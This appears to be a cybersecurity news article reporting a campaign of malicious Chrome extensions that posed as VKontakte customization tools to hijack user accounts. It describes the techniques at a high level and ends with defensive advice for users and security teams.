Over 500,000 users of VKontakte, Russia’s largest social networking platform, have been targeted by a sophisticated malware campaign via Chrome extensions. These seemingly innocuous extensions have been covertly hijacking user accounts, posing as harmless customization tools for the platform.
Malicious Extensions and Account Hijacking
The extensions, masquerading as VKontakte customization tools, secretly subscribe users to groups managed by attackers, modify account settings every 30 days, and exploit security tokens to maintain ongoing control. This operation, initially mistaken for simple theme customization, is a multi-stage account takeover scheme.
The campaign involves five Chrome extensions connected through a malicious infrastructure, with the most significant, “VK Styles,” reaching 400,000 installations before being removed. These extensions utilize a VKontakte profile as command-and-control infrastructure, evading traditional security scans by hiding payload URLs within HTML metadata tags.
Advanced Malware Delivery Techniques
Researchers from Koi uncovered this threat while analyzing extensions injecting Yandex advertising scripts. The malware uses dynamic metric identifiers to avoid pattern matching by security tools. Obfuscated JavaScript functions in the extensions execute arbitrary code fetched from a GitHub repository controlled by the threat actor known as “2vk.”
The malware’s infection strategy showcases advanced evasion tactics. Upon installation, the extensions inject code into every VK page visited, retrieving encoded instructions from the attacker’s VK profile metadata. This directs the extensions to download additional payloads from GitHub, allowing the threat actor to update malicious functionalities without altering the extension code itself.
Security Implications and Recommendations
The malware manipulates VKontakte’s security mechanisms, such as CSRF protection cookies, to bypass restrictions on unauthorized account actions. It automatically subscribes victims to the attacker’s VK group with a 75% likelihood during each session, establishing a self-propagating distribution network. Every 30 days, it resets account settings to override user preferences, ensuring prolonged control.
This operation, active from June 2025 to January 2026, saw continuous development and feature enhancements over seven months. Security professionals are advised to audit browser extensions, monitor for unusual activity in VK APIs, and enforce extension allowlisting policies.
Users noticing unexpected group subscriptions or changes in settings should promptly remove suspicious VK-related extensions and reevaluate their Chrome extension permissions.
For more updates, follow us on Google News, LinkedIn, and X, and set CSN as a preferred source in Google.
